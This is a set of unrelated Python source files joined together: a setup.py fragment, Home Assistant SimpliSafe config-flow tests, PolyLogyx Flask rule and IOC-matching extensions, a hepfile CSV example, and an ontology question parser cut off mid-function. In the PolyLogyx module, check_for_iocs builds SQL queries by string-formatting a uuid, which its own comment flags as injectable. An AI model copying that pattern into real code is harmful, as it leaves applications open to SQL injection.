                    include_dirs = inc_dirs,
                    library_dirs = lib_dirs,
                    libraries = lib,
                    extra_link_args = link_args,
                    sources = src_code)
setup (name = 'pyride_remote',
       version = '0.1.0',
       description = 'This is a Python client extension module for PyRIDE.',
       url = 'https://github.com/uts-magic-lab/pyride_clients',
       author = '<NAME>',
       author_email = '<EMAIL>',
       license = 'MIT',
       platforms = 'Linux, OS X, Windows',
       ext_modules = [module1])
|
"""Define tests for the SimpliSafe config flow."""
from simplipy.errors import (
InvalidCredentialsError,
PendingAuthorizationError,
SimplipyError,
)
from homeassistant import data_entry_flow
from homeassistant.components.simplisafe import DOMAIN
from homeassistant.config_entries import SOURCE_IMPORT, SOURCE_USER
from homeassistant.const import CONF_CODE, CONF_PASSWORD, CONF_TOKEN, CONF_USERNAME
from tests.async_mock import MagicMock, PropertyMock, patch
from tests.common import MockConfigEntry
def mock_api():
    """Mock SimpliSafe API class."""
    api_mock = MagicMock()
    # Expose refresh_token as a read-only property on the mock's type so
    # attribute access (not a call) yields the value.
    type(api_mock).refresh_token = PropertyMock(return_value="<PASSWORD>")
    return api_mock
async def test_duplicate_error(hass):
    """Test that errors are shown when duplicates are added."""
    conf = {
        CONF_USERNAME: "<EMAIL>",
        CONF_PASSWORD: "password",
        CONF_CODE: "1234",
    }
    # Pre-register an entry with the same unique_id so the new flow collides.
    MockConfigEntry(
        domain=DOMAIN,
        unique_id="<EMAIL>",
        data={CONF_USERNAME: "<EMAIL>", CONF_TOKEN: "<PASSWORD>", CONF_CODE: "1234"},
    ).add_to_hass(hass)
    result = await hass.config_entries.flow.async_init(
        DOMAIN, context={"source": SOURCE_USER}, data=conf
    )
    # The flow must abort instead of creating a second entry.
    assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
    assert result["reason"] == "already_configured"
async def test_invalid_credentials(hass):
    """Test that invalid credentials throws an error."""
    conf = {CONF_USERNAME: "<EMAIL>", CONF_PASSWORD: "password"}
    # Simulate the SimpliSafe API rejecting the login.
    with patch(
        "simplipy.API.login_via_credentials",
        side_effect=InvalidCredentialsError,
    ):
        result = await hass.config_entries.flow.async_init(
            DOMAIN, context={"source": SOURCE_USER}, data=conf
        )
        assert result["errors"] == {"base": "invalid_credentials"}
async def test_options_flow(hass):
    """Test config flow options."""
    conf = {CONF_USERNAME: "<EMAIL>", CONF_PASSWORD: "password"}
    config_entry = MockConfigEntry(
        domain=DOMAIN,
        unique_id="abcde12345",
        data=conf,
        options={CONF_CODE: "1234"},
    )
    config_entry.add_to_hass(hass)
    with patch(
        "homeassistant.components.simplisafe.async_setup_entry", return_value=True
    ):
        result = await hass.config_entries.options.async_init(config_entry.entry_id)
        assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
        assert result["step_id"] == "init"
        # Submitting a new code through the options form must update the entry.
        result = await hass.config_entries.options.async_configure(
            result["flow_id"], user_input={CONF_CODE: "4321"}
        )
        assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
        assert config_entry.options == {CONF_CODE: "4321"}
async def test_show_form(hass):
    """Test that the form is served with no input."""
    # Initializing without data must render the user form.
    result = await hass.config_entries.flow.async_init(
        DOMAIN, context={"source": SOURCE_IMPORT}
    )
    assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
    assert result["step_id"] == "user"
async def test_step_import(hass):
    """Test that the import step works."""
    conf = {
        CONF_USERNAME: "<EMAIL>",
        CONF_PASSWORD: "password",
        CONF_CODE: "1234",
    }
    # A successful login (mocked) must produce a config entry whose data
    # stores the refresh token instead of the password.
    with patch(
        "homeassistant.components.simplisafe.async_setup_entry", return_value=True
    ), patch("simplipy.API.login_via_credentials", return_value=mock_api()):
        result = await hass.config_entries.flow.async_init(
            DOMAIN, context={"source": SOURCE_USER}, data=conf
        )
        assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
        assert result["title"] == "<EMAIL>"
        assert result["data"] == {
            CONF_USERNAME: "<EMAIL>",
            CONF_TOKEN: "<PASSWORD>",
            CONF_CODE: "1234",
        }
async def test_step_reauth(hass):
    """Test that the reauth step works."""
    MockConfigEntry(
        domain=DOMAIN,
        unique_id="<EMAIL>",
        data={CONF_USERNAME: "<EMAIL>", CONF_TOKEN: "<PASSWORD>", CONF_CODE: "1234"},
    ).add_to_hass(hass)
    result = await hass.config_entries.flow.async_init(
        DOMAIN,
        context={"source": "reauth"},
        data={CONF_CODE: "1234", CONF_USERNAME: "<EMAIL>"},
    )
    assert result["step_id"] == "reauth_confirm"
    # Confirming without input re-renders the confirmation form.
    result = await hass.config_entries.flow.async_configure(result["flow_id"])
    assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
    assert result["step_id"] == "reauth_confirm"
    # Supplying the password with a successful (mocked) login finishes the
    # reauth without creating a second entry.
    with patch(
        "homeassistant.components.simplisafe.async_setup_entry", return_value=True
    ), patch("simplipy.API.login_via_credentials", return_value=mock_api()):
        result = await hass.config_entries.flow.async_configure(
            result["flow_id"], user_input={CONF_PASSWORD: "password"}
        )
        assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
        assert result["reason"] == "reauth_successful"
    assert len(hass.config_entries.async_entries()) == 1
async def test_step_user(hass):
    """Test that the user step works (without MFA)."""
    conf = {
        CONF_USERNAME: "<EMAIL>",
        CONF_PASSWORD: "password",
        CONF_CODE: "1234",
    }
    # With a successful (mocked) login the user flow creates an entry whose
    # data carries the refresh token, not the password.
    with patch(
        "homeassistant.components.simplisafe.async_setup_entry", return_value=True
    ), patch("simplipy.API.login_via_credentials", return_value=mock_api()):
        result = await hass.config_entries.flow.async_init(
            DOMAIN, context={"source": SOURCE_USER}, data=conf
        )
        assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
        assert result["title"] == "<EMAIL>"
        assert result["data"] == {
            CONF_USERNAME: "<EMAIL>",
            CONF_TOKEN: "<PASSWORD>",
            CONF_CODE: "1234",
        }
async def test_step_user_mfa(hass):
    """Test that the user step works when MFA is in the middle."""
    conf = {
        CONF_USERNAME: "<EMAIL>",
        CONF_PASSWORD: "password",
        CONF_CODE: "1234",
    }
    # A pending-authorization response routes the flow to the MFA step.
    with patch(
        "simplipy.API.login_via_credentials", side_effect=PendingAuthorizationError
    ):
        result = await hass.config_entries.flow.async_init(
            DOMAIN, context={"source": SOURCE_USER}, data=conf
        )
        assert result["step_id"] == "mfa"
    with patch(
        "simplipy.API.login_via_credentials", side_effect=PendingAuthorizationError
    ):
        # Simulate the user pressing the MFA submit button without having clicked
        # the link in the MFA email:
        result = await hass.config_entries.flow.async_configure(
            result["flow_id"], user_input={}
        )
        assert result["step_id"] == "mfa"
    # Once authorization completes, resubmitting finishes the flow and the
    # created entry stores the refresh token.
    with patch(
        "homeassistant.components.simplisafe.async_setup_entry", return_value=True
    ), patch("simplipy.API.login_via_credentials", return_value=mock_api()):
        result = await hass.config_entries.flow.async_configure(
            result["flow_id"], user_input={}
        )
        assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
        assert result["title"] == "<EMAIL>"
        assert result["data"] == {
            CONF_USERNAME: "<EMAIL>",
            CONF_TOKEN: "<PASSWORD>",
            CONF_CODE: "1234",
        }
async def test_unknown_error(hass):
    """Test that an unknown error raises the correct error."""
    conf = {CONF_USERNAME: "<EMAIL>", CONF_PASSWORD: "password"}
    # Any other SimplipyError maps onto the generic "unknown" form error.
    with patch(
        "simplipy.API.login_via_credentials",
        side_effect=SimplipyError,
    ):
        result = await hass.config_entries.flow.async_init(
            DOMAIN, context={"source": SOURCE_USER}, data=conf
        )
        assert result["errors"] == {"base": "unknown"}
|
# -*- coding: utf-8 -*-
import datetime as dt
import os
import re
from flask import current_app
from flask_bcrypt import Bcrypt
from flask_caching import Cache
from flask_mail import Mail
from flask_migrate import Migrate
from flask_sqlalchemy import SQLAlchemy
from flask_wtf.csrf import CsrfProtect
from raven import Client
from raven.contrib.celery import register_logger_signal, register_signal
class LogTee(object):
    """Fan-out dispatcher that forwards status/result/recon log payloads to
    every configured log plugin."""
    def __init__(self, app=None):
        self.app = app
        self.plugins = []
        if app is not None:
            self.init_app(app)
    def init_app(self, app):
        """Instantiate the configured log plugins for this Flask app.

        Raises ValueError when a configured plugin path cannot be imported
        or is not an AbstractLogsPlugin subclass.
        """
        from importlib import import_module
        from polylogyx.plugins import AbstractLogsPlugin
        plugins = []
        all_plugins_obj = app.config.get("POLYLOGYX_LOG_PLUGINS_OBJ", {})
        # Only the rsyslog plugin is activated here, and only when forwarding
        # is explicitly enabled via the RSYSLOG_FORWARDING env variable.
        if (
            os.environ.get("RSYSLOG_FORWARDING")
            and os.environ.get("RSYSLOG_FORWARDING") == "true"
            and "rsyslog" in all_plugins_obj
        ):
            plugins.append(all_plugins_obj["rsyslog"])
        for plugin in plugins:
            # Each entry is a dotted path "package.ClassName"; import and
            # validate it before instantiating with the app config.
            package, classname = plugin.rsplit(".", 1)
            module = import_module(package)
            klass = getattr(module, classname, None)
            if klass is None:
                raise ValueError('Could not find a class named "{0}" in package "{1}"'.format(classname, package))
            if not issubclass(klass, AbstractLogsPlugin):
                raise ValueError("{0} is not a subclass of AbstractLogsPlugin".format(klass))
            self.plugins.append(klass(app.config))
    def handle_status(self, data, **kwargs):
        # Broadcast a status payload to every plugin.
        for plugin in self.plugins:
            plugin.handle_status(data, **kwargs)
    def handle_result(self, data, **kwargs):
        # Broadcast a result payload to every plugin.
        for plugin in self.plugins:
            plugin.handle_result(data, **kwargs)
    def handle_recon(self, data, **kwargs):
        # Broadcast a recon payload to every plugin.
        for plugin in self.plugins:
            plugin.handle_recon(data, **kwargs)
class RuleManager(object):
    """Loads alert rules and IOC intel from the database and evaluates
    incoming osquery log entries against them, producing alerts on matches.
    """
    def __init__(self, app=None):
        # network (the rule-evaluation graph) and last_update are populated
        # lazily by load_rules().
        self.network = None
        self.last_update = None
        if app is not None:
            self.init_app(app)
    def init_app(self, app):
        """Bind to the Flask app and instantiate the configured alerters."""
        self.app = app
        self.load_alerters()
        # Save this instance on the app, so we have a way to get at it.
        app.rule_manager = self
    def load_alerters(self):
        """Load the alerter plugin(s) specified in the app config."""
        from importlib import import_module
        from polylogyx.plugins import AbstractAlerterPlugin
        alerters = self.app.config.get("POLYLOGYX_ALERTER_PLUGINS", {})
        self.alerters = {}
        for name, (plugin, config) in alerters.items():
            # `plugin` is a dotted path such as "package.module.ClassName".
            package, classname = plugin.rsplit(".", 1)
            module = import_module(package)
            klass = getattr(module, classname, None)
            if klass is None:
                raise ValueError('Could not find a class named "{0}" in package "{1}"'.format(classname, package))
            if not issubclass(klass, AbstractAlerterPlugin):
                raise ValueError("{0} is not a subclass of AbstractAlerterPlugin".format(name))
            self.alerters[name] = klass(config)
    def should_reload_rules(self):
        """Checks if we need to reload the set of rules."""
        from polylogyx.db.models import Rule
        if self.last_update is None:
            return True
        # Compare against the most recently updated rule in the database.
        newest_rule = Rule.query.order_by(Rule.updated_at.desc()).limit(1).first()
        if newest_rule and self.last_update < newest_rule.updated_at:
            return True
        return False
    def load_ioc_intels(self):
        """Cache every IOC intel row in memory for the in-process matcher."""
        from polylogyx.db.models import IOCIntel
        self.all_ioc_intels = list(IOCIntel.query.all())
        if not self.all_ioc_intels:
            return
    def load_rules(self):
        """Load rules from the database."""
        from polylogyx.db.models import Rule
        from polylogyx.utils.rules import Network
        if not self.should_reload_rules():
            return
        # NOTE(review): debug prints left in place; consider logger.debug.
        print("before getting rules")
        all_rules = list(Rule.query.filter(Rule.status != "INACTIVE").all())
        print("after getting rules")
        print("all rules - ", all_rules)
        self.network = Network()
        if not all_rules:
            return
        for rule in all_rules:
            # Verify the alerters
            for alerter in rule.alerters:
                if alerter not in self.alerters:
                    current_app.logger.error('No such alerter: "{0}"'.format(alerter))
            # raise ValueError('No such alerter: "{0}"'.format(alerter))
            # Create the rule.
            try:
                self.network.parse_query(
                    rule.conditions, alerters=rule.alerters, rule_id=rule.id, platform=rule.platform
                )
            except Exception as e:
                # A rule that fails to parse is skipped; only its id is logged.
                current_app.logger.error(rule.id)
        # Save the last updated date
        # Note: we do this here, and not in should_reload_rules, because it's
        # possible that we've reloaded a rule in between the two functions, and
        # thus we accidentally don't reload when we should.
        self.last_update = max(r.updated_at for r in all_rules)
    def check_for_ioc_matching(self, name, columns, node, uuid, capture_column):
        """Scan the in-memory IOC list for a (type, value) match; save an
        intel alert and return True on the first hit, False otherwise."""
        flag = False
        for intel in self.all_ioc_intels:
            if capture_column == intel.type and columns[capture_column].lower() == intel.value.lower():
                from polylogyx.utils.intel import save_intel_alert
                flag = True
                save_intel_alert(
                    data={},
                    source="ioc",
                    query_name=name,
                    severity=intel.severity,
                    uuid=uuid,
                    columns=columns,
                    node_id=node["id"],
                )
                current_app.logger.info(
                    "Found an event with existing indicator with type '{0}', value '{1}' from the node '{2}'".format(
                        capture_column, columns[capture_column], node
                    )
                )
                break
        return flag
    def check_for_ioc_matching_opt(self, name, columns, node, uuid, capture_column):
        """Database-side variant of check_for_ioc_matching, used when
        HIGH_INTEL_VOLUME is set so the intel table is not held in memory."""
        from polylogyx.db.models import IOCIntel
        from sqlalchemy import func
        from polylogyx.utils.intel import save_intel_alert
        intel=IOCIntel.query.with_entities(IOCIntel.severity)\
            .filter(IOCIntel.type==capture_column)\
            .filter(func.lower(IOCIntel.value)==columns[capture_column].lower())\
            .first()
        if intel:
            save_intel_alert(
                data={},
                source="ioc",
                query_name=name,
                severity=intel[0],
                uuid=uuid,
                columns=columns,
                node_id=node["id"],
            )
            current_app.logger.info(
                "Found an event with existing indicator with type '{0}', value '{1}' from the node '{2}'".format(
                    capture_column, columns[capture_column], node
                ))
            return True
        return False
    def check_for_iocs(self, name, columns, node, uuid,vt_setting=None):
        """Match the result columns against IOC intel and register values for
        external (e.g. VirusTotal) scanning.

        vt_setting, when given, is the retention-period setting row; scans
        older than that many days get their reputations reset.
        """
        current_app.logger.debug("Scanning for IOCs of Node '{0}' from the results: \n{1}".format(node, columns))
        try:
            from polylogyx.constants import IOC_COLUMNS, TO_CAPTURE_COLUMNS
            from polylogyx.db.models import ResultLog, ResultLogScan,Settings
            self.ioc_match_opt = current_app.config.get('HIGH_INTEL_VOLUME', False)
            for capture_column in IOC_COLUMNS:
                if capture_column in columns and columns[capture_column]:
                    if self.ioc_match_opt:
                        ioc_match=self.check_for_ioc_matching_opt(name, columns, node, uuid, capture_column)
                    else:
                        ioc_match=self.check_for_ioc_matching(name, columns, node, uuid, capture_column)
                    # NOTE(review): the positional args below are never used --
                    # the format string has no placeholders.
                    current_app.logger.info(
                        "columns captured".format(
                            capture_column, node, columns[capture_column]
                        )
                    )
                    if capture_column in TO_CAPTURE_COLUMNS:
                        result_log_scan = ResultLogScan.query.filter(
                            ResultLogScan.scan_value == columns[capture_column]
                        ).first()
                        if result_log_scan:
                            if vt_setting:
                                # Reset stale reputations past the retention window.
                                since = dt.datetime.utcnow() - dt.timedelta(hours=24 * int(vt_setting.setting))
                                if result_log_scan.vt_updated_at and result_log_scan.vt_updated_at < since:
                                    newReputations = {}
                                    result_log_scan.update(reputations=newReputations)
                        if not result_log_scan:
                            from polylogyx.db.models import ResultLogScan
                            current_app.logger.info(
                                "Found a new '{0}' indicator on Node '{1}' to be scanned with value '{2}'".format(
                                    capture_column, node, columns[capture_column]
                                )
                            )
                            result_log_scan = ResultLogScan.create(
                                scan_value=columns[capture_column], scan_type=capture_column, reputations={}
                            )
                        #result_log = ResultLog.query.filter(ResultLog.uuid == uuid).first()
                        #result_log_scan.result_logs.append(result_log)
                        # SECURITY(review): raw SQL built with str.format -- if
                        # `uuid` can contain a quote this is injectable; should
                        # use bound parameters.
                        result_log = db.session.execute("select id from result_log where uuid='{0}'".format(uuid)).first()
                        r_id = result_log[0]
                        db.session.execute('insert into result_log_maps (result_log_id,result_log_scan_id) values ({0},{1})'.format(r_id,result_log_scan.id))
                        db.session.commit()
                    # Stop at the first matched IOC for this entry.
                    if ioc_match:
                        break
        except Exception as e:
            current_app.logger.error("Unable to scan for IOCs - {}".format(e))
    def handle_log_entry(self, entry, node):
        """The actual entrypoint for handling input log entries."""
        from polylogyx.db.models import Rule, Settings
        from polylogyx.utils.rules import RuleMatch
        current_app.logger.debug("Loading Rules and IOCs if not loaded yet...")
        self.load_rules()
        self.ioc_match_opt = current_app.config.get('HIGH_INTEL_VOLUME', False)
        if not self.ioc_match_opt:
            self.load_ioc_intels()
        to_trigger = []
        vt_setting = Settings.query.filter(Settings.name == 'vt_scan_retention_period').first()
        for result in entry:
            self.check_for_iocs(result["name"], result["columns"], node, result["uuid"],vt_setting)
            alerts = self.network.process(result, node)
            if len(alerts) == 0:
                continue
            # Alerts is a set of (alerter name, rule id) tuples. We convert
            # these into RuleMatch instances, which is what our alerters are
            # actually expecting.
            for rule_id, alerters in alerts.items():
                rule = Rule.get_by_id(rule_id)
                to_trigger.append(
                    (
                        alerters,
                        RuleMatch(rule=rule, result=result, node=node, alert_id=0),
                    )
                )
        # Now that we've collected all results, start triggering them.
        alert_aggr_duration_setting = Settings.query.filter(Settings.name == "alert_aggregation_duration").first()
        if alert_aggr_duration_setting:
            alert_aggr_duration = int(alert_aggr_duration_setting.setting)
        else:
            # Default aggregation window of 60 seconds when unconfigured.
            alert_aggr_duration = 60
        for alerters, match in to_trigger:
            alert = self.save_in_db(match.result, match.node, match.rule, alert_aggr_duration)
            node["alert"] = alert
            for alerter in alerters:
                # Carry the persisted alert id into the match handed to plugins.
                match = match._replace(alert_id=alert.id)
                self.alerters[alerter].handle_alert(node, match, None)
    def save_in_db(self, result_log_dict, node, rule, alert_aggr_duration):
        """Persist a rule match: aggregate onto a recent Alert for the same
        (node, rule) inside the aggregation window, else create a new one."""
        from polylogyx.db.models import AlertLog, Alerts
        existing_alert = (
            Alerts.query.filter(Alerts.node_id == node["id"])
            .filter(Alerts.rule_id == rule.id)
            .filter((dt.datetime.utcnow() - Alerts.created_at) <= dt.timedelta(seconds=alert_aggr_duration))
            .first()
        )
        if existing_alert:
            AlertLog.create(
                name=result_log_dict["name"],
                timestamp=result_log_dict["timestamp"],
                action=result_log_dict["action"],
                columns=result_log_dict["columns"],
                alert_id=existing_alert.id,
                result_log_uuid=result_log_dict["uuid"],
            )
            db.session.commit()
            current_app.logger.debug("Aggregating the Alert with ID {0}..".format(existing_alert.id))
            return existing_alert
        else:
            alerts_obj = Alerts(
                message=result_log_dict["columns"],
                query_name=result_log_dict["name"],
                result_log_uid=result_log_dict["uuid"],
                node_id=node["id"],
                rule_id=rule.id,
                type=Alerts.RULE,
                source="rule",
                source_data={},
                recon_queries=rule.recon_queries,
                severity=rule.severity,
            )
            alerts_obj = alerts_obj.save(alerts_obj)
            AlertLog.create(
                name=result_log_dict["name"],
                timestamp=result_log_dict["timestamp"],
                action=result_log_dict["action"],
                columns=result_log_dict["columns"],
                alert_id=alerts_obj.id,
                result_log_uuid=result_log_dict["uuid"],
            )
            db.session.commit()
            current_app.logger.debug("Creating a new Alert with ID {0}..".format(alerts_obj.id))
            return alerts_obj
class ThreatIntelManager(object):
    """Loads the configured threat-intel plugins and fans requests out to them."""

    def __init__(self, app=None):
        self.network = None
        self.last_update = None
        if app is not None:
            self.init_app(app)

    def init_app(self, app):
        self.app = app
        self.load_intels()
        # Save this instance on the app, so we have a way to get at it.
        app.threat_intel = self

    def load_intels(self):
        """Instantiate the threat-intel plugin(s) named in the app config."""
        from importlib import import_module
        from polylogyx.plugins import AbstractIntelPlugin
        configured = self.app.config.get("POLYLOGYX_THREAT_INTEL_PLUGINS", {})
        self.intels = {}
        for name, (plugin, config) in configured.items():
            package, classname = plugin.rsplit(".", 1)
            klass = getattr(import_module(package), classname, None)
            if klass is None:
                raise ValueError('Could not find a class named "{0}" in package "{1}"'.format(classname, package))
            if not issubclass(klass, AbstractIntelPlugin):
                raise ValueError("{0} is not a subclass of AbstractAlerterPlugin".format(name))
            self.intels[name] = klass(config)

    def analyse_hash(self, value, type, node):
        """Ask every loaded plugin to analyse the given hash; plugin failures
        are logged and do not stop the others."""
        for plugin in self.intels.values():
            try:
                plugin.analyse_hash(value, type, node)
            except Exception as e:
                current_app.logger.error(e)

    def analyse_pending_hashes(self):
        """Ask every loaded plugin to process its queued hashes."""
        for plugin in self.intels.values():
            try:
                plugin.analyse_pending_hashes()
            except Exception as e:
                current_app.logger.error(e)

    def generate_alerts(self):
        """Ask every loaded plugin to emit alerts for completed analyses."""
        for plugin in self.intels.values():
            try:
                plugin.generate_alerts()
            except Exception as e:
                current_app.logger.error(e)

    def analyse_domain(self, value, type, node):
        # NOTE(review): delegates to each plugin's analyse_hash (not a
        # dedicated analyse_domain) -- preserved as-is; confirm plugin API.
        for plugin in self.intels.values():
            plugin.analyse_hash(value, type, node)

    def update_credentials(self):
        """Reload plugin config and push refreshed credentials to each plugin."""
        self.load_intels()
        for plugin in self.intels.values():
            plugin.update_credentials()
def create_distributed_query(node, query_str, alert, query_name, match):
    """Expand `#!column!#` placeholders in a query template from the matched
    result's columns and, if every placeholder resolves, queue the query as a
    distributed task for the node. Any failure is logged and swallowed."""
    from polylogyx.db.models import DistributedQuery, DistributedQueryTask, Node
    try:
        data = match.result["columns"]
        placeholders = re.findall("#!([^\s]+)!#", query_str, re.MULTILINE)
        # The query is only runnable when every referenced column is present.
        query_valid = all(key in data for key in placeholders)
        if query_valid:
            for key in placeholders:
                query_str = query_str.replace("#!" + key + "!#", data[key])
            query = DistributedQuery.create(sql=query_str, alert_id=alert.id, description=query_name)
            node_obj = Node.query.filter_by(id=node["id"]).first_or_404()
            task = DistributedQueryTask(node=node_obj, save_results_in_db=True, distributed_query=query)
            db.session.add(task)
            db.session.commit()
    except Exception as e:
        current_app.logger.error(e)
    return
def make_celery(app, celery):
    """From http://flask.pocoo.org/docs/0.10/patterns/celery/"""
    # Register our custom serializer type before updating the configuration.
    from kombu.serialization import register
    from polylogyx.celery.celery_serializer import djson_dumps, djson_loads
    register(
        "djson",
        djson_dumps,
        djson_loads,
        content_type="application/x-djson",
        content_encoding="utf-8",
    )
    # Actually update the config
    celery.config_from_object(app.config)
    # Wrap every task so it runs inside the Flask application context,
    # giving tasks access to current_app, the DB session, etc.
    TaskBase = celery.Task
    class ContextTask(TaskBase):
        abstract = True
        def __call__(self, *args, **kwargs):
            with app.app_context():
                return TaskBase.__call__(self, *args, **kwargs)
    celery.Task = ContextTask
    return celery
# Module-level singletons for the Flask extensions. Each is created unbound
# here and attached to the application later via its init_app() hook.
bcrypt = Bcrypt()
csrf = CsrfProtect()
db = SQLAlchemy()
mail = Mail()
migrate = Migrate()
log_tee = LogTee()
rule_manager = RuleManager()
threat_intel = ThreatIntelManager()
#cache = Cache(config={"CACHE_TYPE": "filesystem",'CACHE_DIR': '/src/cache'})
cache = Cache() |
<reponame>mattbellis/hepfile
import numpy as np
import hepfile as hep

# Load the three CSV sheets column-wise (unpack=True): each row of the
# resulting arrays is one spreadsheet column. Row 0 holds the household ID.
people = np.loadtxt('sheet1.csv', unpack=True, dtype=str,
                    delimiter=",")
#with open('sheet2.csv') as input:
#    cols = input.read().split('\n')
#    for col in cols:
#        print(len(col.split(',')))
# comments='$' keeps '#' usable inside cell values (e.g. "# of riders").
vehicles = np.loadtxt('sheet2.csv', unpack=True, dtype=str,
                      delimiter=",", comments = '$')
houses = np.loadtxt('sheet3.csv', unpack=True, dtype=str,
                    delimiter=",", comments = '$')
# Drop the header cell ([1:]) and convert the ID columns to ints.
people_ID = people[0][1:].astype(np.int32)
vehicles_ID = vehicles[0][1:].astype(np.int32)
houses_ID = houses[0][1:].astype(np.int32)
# Build the hepfile layout: variable-length groups for people/vehicles,
# house attributes as flat singleton datasets per bucket.
town = hep.initialize()
hep.create_group(town, 'people', counter ='ID')
hep.create_group(town, 'vehicles', counter='ID')
#hep.create_group(town, 'houses')
hep.create_dataset(town, ['First name','Last name','Gender ID',
                          'Highest degree-grade'], group = 'people', dtype = str)
hep.create_dataset(town, ['Age', 'Height', 'Yearly Income'], group = 'people', dtype = int)
hep.create_dataset(town, ['Type of vehicle','Gas-electric-human powered'], group = 'vehicles', dtype = str)
hep.create_dataset(town, ['# of riders', 'Year', 'Cost'], group = 'vehicles', dtype = int)
hep.create_dataset(town, ['House-apartment-condo'], dtype = str)
hep.create_dataset(town, ['# of bedrooms', 'Square footage','Year built',
                          'Estimate'], dtype = int)
hep.create_dataset(town, '# of bathrooms', dtype = float)
bucket = hep.create_single_bucket(town)
# One bucket per household ID (0..3); gather that household's people and
# vehicles, set the house attributes, then pack the bucket.
for i in range(0,4):
    for j in range(len(people_ID)):
        if people_ID[j] == i:
            bucket['people/First name'].append(people[1, j+1])
            bucket['people/Last name'].append(people[2, j+1])
            bucket['people/Gender ID'].append(people[3, j+1])
            bucket['people/Age'].append(people[4, j+1].astype(np.int32))
            bucket['people/Height'].append(people[5, j+1].astype(np.int32))
            bucket['people/Yearly Income'].append(people[6, j+1].astype(np.int32))
            # NOTE(review): people[6] is reused here -- 'Highest degree-grade'
            # presumably lives in people[7]; confirm against sheet1.csv.
            bucket['people/Highest degree-grade'].append(people[6, j+1])
            bucket['people/ID'] += 1
    for j in range(len(vehicles_ID)):
        if vehicles_ID[j] == i:
            bucket['vehicles/Type of vehicle'].append(vehicles[1, j+1])
            bucket['vehicles/# of riders'].append(vehicles[2, j+1].astype(np.int32))
            bucket['vehicles/Gas-electric-human powered'].append(vehicles[3, j+1])
            bucket['vehicles/Year'].append(vehicles[4, j+1].astype(np.int32))
            bucket['vehicles/Cost'].append(vehicles[5, j+1].astype(np.int32))
            bucket['vehicles/ID'] += 1
    bucket['House-apartment-condo'] = houses[1, i+1]
    bucket['# of bedrooms'] = houses[2, i+1].astype(np.int32)
    bucket['# of bathrooms'] = houses[3, i+1].astype(np.float32)
    bucket['Square footage'] = houses[4, i+1].astype(np.int32)
    bucket['Year built'] = houses[5, i+1].astype(np.int32)
    bucket['Estimate'] = houses[6, i+1].astype(np.int32)
    hep.pack(town, bucket)
hep.write_to_file('town_hep_long.hdf5', town,force_single_precision=False)
|
<gh_stars>0
# [TODO] complex object extents: between, of-on, to-for, for-to
# [TODO] how to parse sentences that contain if
#!/usr/bin/env python
from owlready2 import *
import owlready2
owlready2.JAVA_EXE = "C:\\Program Files (x86)\\Java\\jre1.8.0_221\\bin\\java.exe"
import re
import csv
def prulars_to_singular(my_str):
    """Crudely singularise an English noun: '...ies' becomes '...y',
    otherwise a single trailing 's' is stripped."""
    if my_str.endswith('ies'):
        return my_str[:-3] + 'y'
    if my_str.endswith('s'):
        return my_str[:-1]
    return my_str
def what_raw_questions(corpusId = "GeoAnQu", corpusLabel = "QuAnGIS corpus of geo-analytic questions", corpusNS = "qac"):
    """Scan a question corpus for "What ..." patterns, write intent/object/
    adjective/extent tables as CSV, and populate the loaded ontology.

    Relies on module-level globals set in __main__: corporaDir, dataOutputDir,
    onto, and the compiled matchers (intentMatcher, extentMatcher,
    simpleObjMatcher, subMatcher) plus the `nonobjects` stop-list.
    """
    with open(f"{corporaDir}\\{corpusId}.txt", 'r') as datacsvfile:
        datacsvreader = csv.DictReader(datacsvfile, delimiter=';')
        # [SC] writes detected intent to this file as table with intent and question id
        with open(f"{dataOutputDir}\\{corpusNS}_what_raw_intents.csv", 'w', newline='') as intentcsvfile:
            intentfieldnames = ['intent', 'qid']
            intentwriter = csv.DictWriter(intentcsvfile, fieldnames=intentfieldnames)
            intentwriter.writeheader()
            with open(f"{dataOutputDir}\\{corpusNS}_what_raw_objects.csv", 'w', newline='') as objcsvfile:
                objfieldnames = ['intent', 'relation', 'object', 'distance', 'qid']
                objwriter = csv.DictWriter(objcsvfile, fieldnames=objfieldnames)
                objwriter.writeheader()
                with open(f"{dataOutputDir}\\{corpusNS}_what_raw_adjectives.csv", 'w', newline='') as adjcsvfile:
                    adjfieldnames = ['intent', 'adjective', 'distance', 'qid']
                    adjwriter = csv.DictWriter(adjcsvfile, fieldnames=adjfieldnames)
                    adjwriter.writeheader()
                    with open(f"{dataOutputDir}\\{corpusNS}_what_raw_extents.csv", 'w', newline='') as extentcsvfile:
                        extentfieldnames = ['relation', 'extent', 'qid']
                        extentwriter = csv.DictWriter(extentcsvfile, fieldnames=extentfieldnames)
                        extentwriter.writeheader()
                        # [SC] create Corpus individual for the ontology
                        corpusIndiv = onto.Corpus(corpusId)
                        corpusIndiv.label = corpusLabel
                        counter = 0
                        qidStr = "c("
                        for q in datacsvreader:
                            intentResult = intentMatcher.search(q['Question'])
                            if intentResult:
                                intentwriter.writerow({
                                    'intent': intentResult.group('intent')
                                    , 'qid': q['ID']
                                })
                                # [SC] create Question individual
                                questionIndiv = onto.Question(f"{corpusNS}-{q['ID']}")
                                questionIndiv.label = q['Question']
                                # [SC] connect Question and Corpus
                                corpusIndiv.hasQuestion.append(questionIndiv)
                                # [SC] create IntentPhrase individual for the ontology
                                intentPhraseIndiv = onto.IntentPhrase(f"{corpusNS}-{q['ID']}-{intentResult.group('adjective')}{intentResult.group('intent')}")
                                intentPhraseIndiv.label = f"{intentResult.group('adjective')}{intentResult.group('intent')}"
                                # [SC] connect IntentPhrase and Question
                                questionIndiv.hasPhrase.append(intentPhraseIndiv)
                                # [SC] create Intent individual for the ontology; no need to check for duplicates
                                intentStr = prulars_to_singular(intentResult.group('intent'))
                                intentIndiv = onto.Intent(f"i-{intentStr}")
                                intentIndiv.label = intentStr
                                # [SC] connect IntentPhrase and Intent
                                intentPhraseIndiv.hasIntent.append(intentIndiv)
                                if intentResult.group('adjective'):
                                    # [SC] write to file the entire adjective phrase at first
                                    adjwriter.writerow({
                                        'intent': intentResult.group('intent')
                                        , 'adjective': intentResult.group('adjective')
                                        , 'distance': 0
                                        , 'qid': q['ID']
                                    })
